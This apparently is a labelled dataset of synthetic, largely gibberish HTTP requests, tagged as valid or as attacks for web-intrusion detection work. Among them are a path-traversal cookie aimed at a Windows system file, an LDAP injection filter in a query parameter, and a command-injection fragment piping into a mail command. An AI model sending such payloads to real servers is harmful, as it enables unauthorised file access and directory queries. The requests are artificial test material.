GET /nkwuo6DFvoK.t/ust/gcuhierAclm/foo2aimhxrsEeoaetnrh/k9select/sanRd/hvjj76Eh0w/eC1odeb/bic/Ondstaf.png?lItao3sSakdplo=nicrpoOsaas&XIt4-=vyaCa&st09etailrwqsew=2&TnbW-klQ1echo=ee9miHoidur&zz=uQx7u54KIJK&cbadAaiastes=mail++dts4egf8%40oiE.itsl.gov+++++%3C%3C+++++%2Ftmp%2Fwu.c+%3B&ros=sgwm&Nsrat3rkEnantle=oGIsonti&ecSh=0&euqfnthAvycLiir=2trlsesnhe HTTP/1.0
Host: 251.136.10.2
Connection: close
Accept: video/*;q=0.5, text/*;q=0.5, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: ids-eeeO1d;q=0.0, iral-Ma9shE;q=0.9
Cache-Control: no-cache
Client-ip: 87.24.160.134
Cookie: ewn=we;26edjmS=57692;ur8neiaeiodtzw=rformhg 8lebt9aiym
Cookie2: $Version="848"
Date: Mon, 09 Feb 09 05:36:25 CET
ETag: W/"J3rodTGe@9EySOL0.e"
Expect: a9incnt
From: cdtlidt@uc5ldntS6.ch
If-Modified-Since: Mon, 16 Feb 09 09:19:44 CET
If-Unmodified-Since: Mon, 12 Jul 04 03:12:43 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Nov 08 24:57:37 CET
Max-Forwards: 5
MIME-Version: 4.0
Pragma: e=ale
Proxy-Authorization: Digest qop=alb2ja0
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: http://www.duas.biz/shrdtq/pweqtO/rucR2eD/teoeaeEw/e8hame.cgi
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ajxlGWuU2 http://www.idme.com
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: eaDhah; uero=atkhaE
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43442
Start - Id: 15848
class: Valid
GET /teu3lS.aspx?letf9hkw=43646054&ds0uUauzn=aptooHaGzylfIserC&hyoewjtesF76=rb38hK47FYu4&hsa80rn1stemri=9253840&gh6sreeiimqain=6049&ltorsnettqntf=57 HTTP/1.0
Host: www.mtSexe.de
Connection: close
Accept: text/html, text/*, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hfoesr-Lo, aIaskt-fzlbih, cdsems-a0iOea3e
Cache-Control: min-fresh=8
Client-ip: 127.204.91.129
Cookie: Ld=dLS_Jw;urnKsdKhaeynes=aGd@ioC@;5sice8=14206613;eherziieacuK=edr;sgse9=o;gdattYp=e7mQ2J1
Cookie2: $Version="2"
Date: Sat, 30 Aug 08 07:06:48 CET
ETag: "Lgka-Qg8YEq22Z3L"
Expect: 100-continue
From: ciaes@3cRcrame2.ch
If-Modified-Since: Fri, 20 Nov 09 08:48:18 UTC
If-Unmodified-Since: Wed, 18 Feb 04 01:34:35 GMT
If-Match: "X.Q7ySw@0_vTbJX"
If-None-Match: *
If-Range: *
Max-Forwards: 093
MIME-Version: 7.8
Pragma: o=Tw6
Proxy-Authorization: Digest nc=6CeB3cE8
Authorization: tlgetT e8ulbh=RasT
Range: -630,9-,363-
Referer: http://nneownyu.gov/oeaiRhle/paees/oimo.htm
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: shte (nCcJw3Szb3)
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 265x821
Via: 3.3 9.63.20.40:5, HTTP/5.6 200.7.184.148, 6.0 www.Uhenii.jpeg
Transfer-Encoding: deflate
Upgrade: IDh/1.5, et4A/0.8, doooen/6.2
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 15848
Start - Id: 15651
class: Valid
GET /e6w/cjjxO59o7T7tNsha/lBZX5sW56D3/ea06hwsexwottau/e6mf/uheWctqeloobt.png?Ii33yhx9yi=a0jX9JlQTI&ts7w640iot=lese%5CensSctsPoR&0s98neIsHc1aty=f7sRo9irableAdSa&ri=mBKeJ8pZI4gA&JUuusreQIO8OC3=u1mteqismiuar HTTP/1.0
Host: 16.206.102.220:5
Connection: keep-alive
Accept: video/*, image/gif;q=0.5, application/*
Accept-Charset: x-mac-roman;q=0.5, iso-8859-3;q=0.2, windows-1257;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 9.72.225.172
Cookie: ahlmvhlihtc=e&hb;8al0dnwstoie=5766552202
Cookie2: $Version="6"
Date: Sun, 21 Jan 07 02:17:33 GMT
ETag: "bg6ooN88K@gpwH.ULdL"
Expect: os6bi=AtHottq;ytotu
From: enyentta@0oaremMh1h.cz
If-Modified-Since: Mon, 29 Mar 10 01:28:12 CET
If-Unmodified-Since: Thu, 26 Apr 07 20:27:59 CET
If-Match: *
If-None-Match: "svrb.ZOjz1KABN1My3ki"
If-Range: Sun, 30 Aug 09 14:49:49 UTC
Max-Forwards: 01
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="o6hs4e"
Authorization: spo7 aot8ti=gN5twl8
Range: 4066-0881,3-
Referer: http://e7lasorA.gov/e0tn6i/eu5ohng/etni.gif
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: nwWLd7en http://www.dwh3.be
UA-CPU: PowerPC
UA-Disp: 043,7183,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2296x8201
Via: 3.0 31.95.87.189
Transfer-Encoding: gzip
Upgrade: 6tin9m/2.5
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15651
Start - Id: 16382
class: Valid
GET /afsnxs8n5wair7t5oo/annyiEu.htm?Hbmi=4228342&1g1ZhMHmetadrop=sJKeIuMMcSIg&lp8ods5UaRTraau=twth&e4bhzktSyeAsel=ale&N3._XKUchildO=tm0joEldbitveae1&ndRie3es=3&nnhnblxIyaw=iSboeyrsjn HTTP/1.1
Host: www.tbn7dfgeh.be:80
Connection: close
Accept: application/*;q=0.7, image/jpeg, application/zip
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, identity;q=0.6, identity, identity
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 240.84.81.255
Cookie: swlp=968;Ank= en;r[in$and;escmimCoGAma7d=6178208;eiRuBj5vlkTBf1=h6ewoda5bh
Cookie2: $Version="05"
Date: Fri, 13 May 05 12:07:27 GMT
ETag: "UQpj0l.t2C.cLR5g"
Expect: 100-continue
From: ehadrmtl@rqra.fr
If-Modified-Since: Sat, 11 Feb 06 24:04:04 GMT
If-Unmodified-Since: Mon, 12 Jan 09 17:15:17 CET
If-Match: "jlUL2vBqBR.0WNYy"
If-None-Match: "tYP.J.6G6i2YPYh"
If-Range: ".FykaHAHcVqAu6t_Sat"
Max-Forwards: 2
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: ihnaT sR5Ne4c=iwllit
Authorization: NTLM bm5yYWxzcjRvbnI4ZW9RMUhxdGFhT2h1Y2VudDducmFlcHNtaGk3YWk=
Range: -652120,9-,091-
Referer: http://www.sefo.org/Lbde/htau/4kNn/zebnk/ia85.png
TE: gzip
Trailer: Via
User-Agent: tHss3edo2t (s_UK9-BzI; i7fd5jv; eTllpnP; nhuh6_OCkL)
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8564x328
Via: a2k/5.4 www.hEssoa0I.jpg:64, lggiii/0.6 www.e1isvyot.htm
Transfer-Encoding: deflate
Upgrade: 2qpnf/0.0, mrmr/9.5, uql/4.8, rtnga/2.2, nj9ne/2.7
Warning: 209 www.atoDlsAt.htm "lwrhisc1S" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16382
Start - Id: 20111
class: Valid
GET /sttm8sv4eepc6raiawaa/aO7CeJ9/ep.php?CuWD=ol%5C+ut%27deletec&i2=9575564&pngr=11&nerntnssoat6I=iwdeHgety&aoiaocRhxscnt=wn&6xt23hoad=60291&Leei=om7wIyS%409SQ HTTP/1.1
Host: www.crqaaw6Aee.it
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish, iso-8859-2, shift_jis
Accept-Encoding: *
Accept-Language: ms-8itWjgn, 5hl-ntanm
Cache-Control: vIuh=bn
Client-ip: 56.173.250.176
Cookie: r6y6dLglaEtDmn=4867035
Cookie2: $Version="81"
Date: Fri, 12 Jan 07 18:15:31 GMT
ETag: "zn.IiEeDfV_qRyqiN"
Expect: gmaa5=1uopsV;orhaFbr=zdEhe7nt
From: t261O@oawcrm.be
If-Modified-Since: Tue, 20 Jan 04 20:43:57 UTC
If-Unmodified-Since: Mon, 29 Aug 05 09:06:47 UTC
If-Match: "vPWjm0nTOtFedxX19cJ1"
If-None-Match: "Y30FTVH4jKT_xX-UIFX"
If-Range: "GTpceOm3.Q2u07y3"
Max-Forwards: 485
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: 8dgRi tith2yiI=td0ke
Authorization: Digest uri=/rn8e/eupteu.mpg
Range: 41-,-67213
Referer: /d7eln/asckA/leaoq/fdenzn/neeamid5.mpg
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: 6kce (xJ.@HS)
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2082x0663
Via: vox/4.9 www.yTnw.js:893, 4.3 159.227.30.14
Transfer-Encoding: identity
Upgrade: nuqRd/7.5, ae4sn/3.4
Warning: 232 58.2.188.101 "uuiureanrift" "Sun, 28 Aug 05 06:35:42 CET"
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20111
Start - Id: 33139
class: Valid
PUT /doexecO/aQJ77t/.8processing-instructiondropPy/5taijwhereUflocation.bUBGunion/ariscehmhob3iiRttlm/R9gnRP/fuVHNepJb1rV3n/lshavingyxbleHvyi.asmx? HTTP/1.1
Content-Length: 147
Content-Language: ORunf,dpnyehT,1e45l
Content-Encoding: compress
Content-Location: /erSa/tprl/eaHTi.zip
Content-MD5: dGR1aUEyb2xvYUFtcGVjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Apr 07 08:51:40 CET
Last-Modified: Sat, 28 Oct 06 18:40:58 CET
Host: 85.158.13.207
Connection: keep-alive
Accept: video/*, application/rtf, text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 156.100.161.187
Cookie: noiomsip=hef;Ot9aehgme=3215860;D_by=419379501;w2=5;BApHfromI=ed
Cookie2: $Version="653"
Date: Tue, 16 May 06 15:02:54 CET
ETag: "CIYpvMZBh6R6qvtRRp"
Expect: 100-continue
From: da5Aamnq@DilRnio.gov
If-Modified-Since: Sun, 16 Jul 06 11:10:06 GMT
If-Unmodified-Since: Tue, 09 Jun 09 03:57:53 GMT
If-Match: "U3IZYxHpJFoHa27H5"
If-None-Match: "C.W9yBF@xwGHfilTF"
If-Range: Wed, 24 Mar 10 08:33:34 GMT
Max-Forwards: 39
MIME-Version: 6.2
Pragma: hubnenht='1nrabsfu'
Proxy-Authorization: Digest uri=/EsalneHn/dnt3tE/TaleA/I69rtf/t3aeua.php3
Authorization: nth3h rNuyrIor=hlh2sS
Range: -7476
Referer: /bela.shtml
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: hguacre4rr55na
UA-CPU: MIPS
UA-Disp: 879,680,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: HTTP/3.5 247.112.27.70, xecn/1.9 www.we3bR.htm, 0.2 181.204.140.7
Transfer-Encoding: gzip
Upgrade: ovT/9.9, reD/3.1, eel/0.6, oeey/7.8, u2uyl/8.8
Warning: 541 www.lrooltb.jpg "eaO7ssg4nbeu" 
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iCu7K=I1tAu&hfr0a6t=iBC&etSao3fTs=snho1aAs&UEhkZ0a9exec=user1&liriou=0594036&jSee=afpca&utgaed=608700&2iee=fa1boMuiAi&lt= h rpecho8$[cuoaalsehk

End - Id: 33139
Start - Id: 415
class: Valid
GET /oj/sSw6ctzv6XF5Ce.bin?RsataBi=2130&8logZ4L2aN3=t&rA=ranwgVwatmk&ihe4eglwee=0bconnect99hsureoi%2Fi6mcdiv%3D+ HTTP/1.0
Host: www.epotawln.org
Connection: close
Accept: application/postscript;q=0.4, text/*, video/quicktime
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.8, deflate;q=0.7, deflate;q=0.1, gzip, identity;q=0.0
Accept-Language: ohn-donxee;q=0.8, hsabdgsi-efwtntoh, o-lAwfmc;q=0.0, nidqt-fiot5m;q=0.9, wimiAe0-ufief;q=0.2
Cache-Control: n7='tt'
Client-ip: 54.33.113.204
Cookie: ei0aSe87eeete=thsth4km;r5md=fmc?Ionmryw am;slEstiots2=rrehson4yhttpF ;i9nn=u;r1adi3ewhueao=Cgie5
Cookie2: $Version="17"
Date: Mon, 26 Jul 04 15:07:33 UTC
ETag: "2TfC2JU62zzdhHb5I"
Expect: 100-continue
From: rPtoKwaw@nOdai.biz
If-Modified-Since: Thu, 06 Jul 06 12:50:52 UTC
If-Unmodified-Since: Tue, 29 Sep 09 01:15:50 GMT
If-Match: "lsTkILcoxZ..v7BKBg3a"
If-None-Match: "JELitddlCrvVfZPFu"
If-Range: Mon, 29 Mar 04 08:50:35 GMT
Max-Forwards: 28
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic Y3RyYWIyblk6dWV3bjJxaA==
Authorization: reSmaG iooeb2=sinifhAE
Range: 63476-77033,-529,5-
Referer: /clk0t2qf/gmdusbPe/meere/670r26o/o1u86u.txt
TE: deflate,chunked,chunked;q=0.1
Trailer: Trailer
User-Agent: e78fHx_a http://www.rNaTp.org
UA-CPU: Sparc
UA-Disp: 810,8513,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7545x2141
Via: 9.8 www.70t7x.tiff, HTTP/3.3 www.toohhca.shtml, FTP/5.4 172.68.109.9:6411
Transfer-Encoding: compress
Upgrade: t3uow/0.2, 6nnat/6.0, iR9/7.3, tts/0.0
Warning: 942 91.154.237.154 "h59jnrdncehalTSdatn" "Tue, 19 Oct 04 16:05:21 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 415
Start - Id: 2920
class: Valid
GET /xd9cpzb-7vIR/jqZX7j/eAqV3IOO188ttQU8fNzM/sE1TEfever8s/n8eedGe/19i./ncX-D/-Bk.asp? HTTP/1.0
Host: 26.254.113.245
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-1;q=0.8, windows-1254;q=0.7, windows-1253;q=0.1, x-mac-chinesetrad;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 89.111.222.60
Cookie: shIPyt=a;usrqYusrRhBI=c;ebmesanmec6aa=ocfh0vo;sgOE=7096;eta3ojyamre=75231945;.orOA=e3  
Cookie2: $Version="79"
Date: Fri, 12 Jan 07 11:11:43 GMT
ETag: "NYIx.zUUhySESjCSVLgJ"
Expect: ySha9
From: qg1rhg@3iIi.de
If-Modified-Since: Sun, 20 Feb 05 13:52:58 GMT
If-Unmodified-Since: Fri, 10 Jun 05 15:00:07 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 08:33:35 CET
Max-Forwards: 3
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM cm93bG14bmdvdHRuc3lZaW1JNGVoYUVtcnNERWlsN3luZWlkZWU=
Authorization: Digest cnonce="inl3s"
Range: 8-0812,200838-406
Referer: http://www.rhjs.org/umss6te/lKie/hbi4crEE/ssbSoNra/i8tr2cw.cgi
TE: trailers,chunked;q=0.9
Trailer: Trailer
User-Agent: tD.g0dF http://www.8frtag0l.it
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 640x6169
Via: FTP/1.6 www.gidcbt.css
Transfer-Encoding: compress
Upgrade: aqeAe/2.5, uaisaa/2.3
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 88.122.68.80
X-Serial-Number: 369098757505343425
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2920
Start - Id: 32358
class: Valid
GET /jh5wsstents/pc/pgMjm/guF/s8uLdnEysftt7.js?52eeadewoc00oao=27&sldwnn9ee=eoAC3aotseivotoh7t&CdEcet=54574003&tt3oia=9 HTTP/1.0
Host: www.esre.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr, x-mac-arabic, ks_c_5601-1987, windows-1251;q=0.8, x-mac-turkish
Accept-Encoding: gzip, identity, deflate
Accept-Language: dtaeu-afi;q=0.2, eea-soici;q=0.6, uxi-tah, mtnbr-lmci363e;q=0.5
Cache-Control: no-cache
Client-ip: 196.66.220.182
Cookie: hWHj=alei;siae4=u c/hDcopyhilci;enoydaDhiHI=l3r%1ephpt8i r[r/0iemeta;ostar63htcshaw5=Anjjpec4vd;s8sbisrGe=shnwxue5nla;ZbES3tU=wMZS
Cookie2: $Version="67"
Date: Sat, 12 Apr 08 03:05:36 CET
ETag: W/"CMZR-5.v_gIxvElce"
Expect: tHuiic
From: nTc4g7an@ldne.de
If-Modified-Since: Thu, 17 Feb 05 15:57:07 UTC
If-Unmodified-Since: Mon, 01 Sep 08 15:59:29 GMT
If-Match: "VCyvrKxFXQo@1U_i@E."
If-None-Match: *
If-Range: "q3tJPU2Pq18Otmt"
Max-Forwards: 9
MIME-Version: 5.8
Pragma: RgNhoie=taoet955
Proxy-Authorization: ystIyh iiasosr=f6ai
Authorization: ehEHr elocf7=elwanoi
Referer: http://www.zaolv40.ch/ls1q/nsfftlee/osee/otdeso/nzar.mspx
TE: trailers,gzip
Trailer: Host
User-Agent: nXlONeweUewh1th
UA-Disp: 5380,9779,16
UA-OS: Windows 98
Via: 4.5 www.mOoo.shtml, HTTP/6.4 www.sctia.css, neroui/3.5 www.1ni9o.gif
Transfer-Encoding: identity
Upgrade: ruyu/5.1, dtm/7.5
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 88.70.121.27
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32358
Start - Id: 31467
class: Valid
GET /5sEt/ybodpowtsdseUeiweEzm/trafeneey/7DiT/f6GYsy6lwI3Mj..htm?aEZeotefhod=slu1msbROodh0eilel&lG=siIaa+ecgBoq&eoB=snj HTTP/1.1
Host: 197.183.231.36
Connection: dfsi
Accept: video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-earve;q=0.4
Cache-Control: ap2Leh='ayhno'
Client-ip: 126.132.65.203
Cookie: K.B0=eeum(sttsamu%eso;mfrrTaheitGt=Brnm4dshoE o;RconnectDoV=kjfstuifuaiph32i
Cookie2: $Version="8"
Date: Fri, 11 Jan 08 08:38:25 GMT
ETag: "9xymynxfEbpm3yxYm"
Expect: 7rclau
From: gdf9c@jueelrawg9.de
If-Modified-Since: Tue, 25 May 04 14:31:00 CET
If-Unmodified-Since: Tue, 07 Oct 08 15:42:29 UTC
If-Match: "eedBgD9FPTJwRqfwi6.4"
If-None-Match: *
If-Range: Thu, 07 Dec 06 07:07:44 UTC
Max-Forwards: 5319
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM cWQ2a3FmZWlTdDR2cWhyTzVOcG9uNmR1Ykh5cnRqaG50Yw==
Authorization: Basic aWhlczpFZGxiZWN0Yg==
Range: 024-703,-943,-1578
Referer: http://www.liLeyA.biz/fDru/Itsln/saubcpta/ghlA.conf
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 0.9; ia-tS; rv:0.7.9) Gecko/38143251
UA-CPU: Sparc
UA-Disp: 7523,3452,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: 2.9 www.Kemuc.shtml
Transfer-Encoding: emiet
Upgrade: nru/5.8, ett/0.4, tbh9/3.1
Warning: 701 www.eidmrek.tiff "nxaiehq8edtge" "Sat, 02 Jul 05 03:49:42 CET"
X-Forwarded-For: 56.45.196.45
X-Serial-Number: 1337403720563308
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31467
Start - Id: 45341
class: PathTransversal
GET /avaAee6/Tayg8eansvnhdvladh8/uwa5Xesfgre/6tiizisoewc/1zt.1kOHcBUqOTvP.htm? HTTP/1.1
Host: 181.123.33.15
Connection: sdyeq
Accept: */*;q=0.7
Accept-Charset: x-mac-korean, iso-8859-1, iso-8859-15
Accept-Encoding: deflate, compress
Accept-Language: tydra-tds, rAc1tut-g
Cache-Control: no-transform
Cookie: ytrsnrtwkTm=sdKV@iXi_wCx;FLBHl9P8ZlibmP=9e7su;lteUr9hweowomtn=../../../WINDOWS/autoexec.bat;5G.MLiWKvgd=u h;ngftryhdrauhf=Chaed/tUBdoh7a-
Date: Thu, 23 Apr 09 13:17:44 UTC
Expect: eerreth=isntae
If-Match: "W.6RSvjSTg-9-5fX1"
If-Range: Sat, 11 Dec 04 19:00:46 CET
Max-Forwards: 946
Proxy-Authorization: etuet tnNey1=stfscA
Authorization: Basic bG9nb2hrcDpwbm5ub3NUbw==
Range: 9812-02,79101-,29-22
Referer: /feheebEC/nntttotR/sSkLt.shtml
User-Agent: aTAdmJ/9.1
UA-Disp: 163,670,16
Transfer-Encoding: sddzei; sm15iAmm=rlge
Warning: 580 81.175.3.219 "1s1dsle" "Tue, 20 Apr 10 05:45:08 UTC"
X-Forwarded-For: 41.96.252.32
X-Serial-Number: 09880

null

End - Id: 45341
Start - Id: 20304
class: Valid
GET /IinsertnetcateT2xvy/sdoe/dteseeabhoeH/myo.kA/nbgjaesiasata9dmipA/6gsOnR.qOg.d/hioei/halhr57ossleh4Tj.dll?WZW@j5q=8656469&egcwble=eepie%3Dsod7ts&r6xaftnt2uheo=b%25z%3BaomochaftahdtPn%24scripts&Rrtaoayttat=8kmrw&qiDseczneeeiEl=15318&ssomimlbtte=08&o2swh3s2sm=w7dot%2B%5B%40ae&jzey3ndlfnmnki=clDR&oneltam3fu=t%26&lao=orJOhz_aZib&rnn=png&keyu1nodntpOe=2&odadrasngT=5737891&ekno=aNzuSn6o9Kh1 HTTP/1.0
Host: www.he7gohesso.st
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 235.128.217.246
Cookie: n2eattteLce=ra;jeiaas=334
Cookie2: $Version="6"
Date: Sun, 02 Jul 06 07:56:14 CET
ETag: ".K4uxiMGwo34VLinBM"
Expect: 100-continue
From: ss7chat@0nncgbi.fr
If-Modified-Since: Mon, 23 Oct 06 09:51:03 CET
If-Unmodified-Since: Thu, 08 Dec 05 10:29:26 UTC
If-Match: "Fvw6_.wgmUx2x07og"
If-None-Match: *
If-Range: "j1ziL5EdvDwEjr1A2a"
Max-Forwards: 8763
MIME-Version: 1.1
Pragma: arwIr=r47mtsta
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: pedkYw rtTm58=c2n38te
Range: -755,8352-
Referer: /9t6feCe/zsOde.bin
TE: trailers
Trailer: Transfer-Encoding
User-Agent: NYllmref0
UA-CPU: PowerPC
UA-Disp: 2037,1915,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 608x215
Via: 7.1 89.21.42.180
Transfer-Encoding: identity
Upgrade: tsen/7.5, oodl/0.1
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20304
Start - Id: 38330
class: LdapInjection
GET /cbhsfnhnLfF3G/eUmo/t0Gs7L/uNmuFYVxvMa/7LcCICU/t6em.php3?sefsitNryhr=2488&hegwhdhe=lsumn&oertb=76013&iaheagkdaocS5=bh&rv=chat&_0auLPCpu6=admin1ta3&tgri=e2&9hSosl=9&twx=iwnN&xsdosAEevp1=eszeEspelsaodhhf&ieqhseabctWejRz=niym&w9rcnQruioStj=aez&cr=86&neee8nostt=42&taiatnsueo2en=%29%28++%7C+%28displayName%3Dhad*%29++%28name+++%3D+++had*+%29%28mail%3Dhad*+++%29 HTTP/1.0
Host: www.lsxa9fKt9T.it
Connection: keep-alive
Accept: image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: esuvo-qaneqo;q=0.2, enene-mlk, 07nyieta-e;q=0.7, I-x1
Cache-Control: min-fresh=4
Client-ip: 83.209.156.197
Cookie: unteeo2=yatdjevhhousrccrs@l;j0dwwix3zsock_stream-=oyrS;rSuN=31016;weaTiy=064233802
Cookie2: $Version="689"
Date: Sun, 30 Jul 06 09:58:08 UTC
ETag: "WbPrN@xJVi3tQ@DS"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Wed, 14 Jan 09 17:32:09 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:14:20 UTC
If-Match: "WcYr04L_hY7FT3Yv"
If-None-Match: *
If-Range: *
Max-Forwards: 879
MIME-Version: 8.3
Pragma: ysenanRd='eo'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic Ym5vOG1uM2s6eDJpaGE4Zmk=
Range: 4549-1
Referer: http://www.idSAs.com/wsNe5.txt
TE: gzip;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (compatible; MSIE 2.7; Open BSD i586; sHlrah; oqudrtmNn)
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: 7.2 www.Altolo.png:8870, 1.8 78.30.23.67, a2fA/7.5 50.73.68.131
Transfer-Encoding: deflate
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38330
Start - Id: 20900
class: Valid
GET /JhKB_gSpb/qei.RUSv0@2eval19/0yUknau18/w7r1p19Z/ea/l_@pwtmcyc0childI2H/ScoCuH4P.shtml?O2bmKTP2ephttpsB=inputf%3Feytsu%2Be%7Cirr+evalhbgb&poe4swh=sys HTTP/1.0
Host: www.aor2e5ep.net
Connection: R9azitee
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=04609
Client-ip: 70.216.76.72
Cookie: t8qigdaNtosid=7008063;nrmnoaadjlh=rlh1detmnqFxg;Nt8palstyi=6;cfXnscriptCYvCJ=h5R5;nT6IHKgnkTlN=003;soe2surt=a15D6Z_CJP
Cookie2: $Version="53"
Date: Tue, 20 Nov 07 04:31:02 UTC
ETag: W/"UCpraVfCtd0pS96L4"
Expect: 100-continue
From: iStt7oha@lc2epd8.cz
If-Modified-Since: Tue, 16 Feb 10 14:56:11 UTC
If-Unmodified-Since: Fri, 27 May 05 08:09:29 UTC
If-Match: "qLnxGOf_Fc4td-T_.WzA"
If-None-Match: "WGXITmSO9V97OZKDTU"
If-Range: Fri, 28 Oct 05 07:50:18 GMT
Max-Forwards: 46
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic dGxodXNpYzp0b3VpZWg=
Authorization: Basic d05pYWpzOjRlc04=
Range: 822099-090,811-0
Referer: /selivre/spro7/agTDRu.rar
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: dAzietnspho
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 2726x7026
Via: 1.3 www.xReioNo.jpg:11774
Transfer-Encoding: gzip
Upgrade: neaxe/1.5
Warning: 431 85.173.16.1 "r5mststaned9nnteeeoM" "Sun, 21 Jan 07 21:50:10 GMT"
X-Forwarded-For: 138.202.93.19
X-Serial-Number: 8671982338196
----: ------------------------------------------
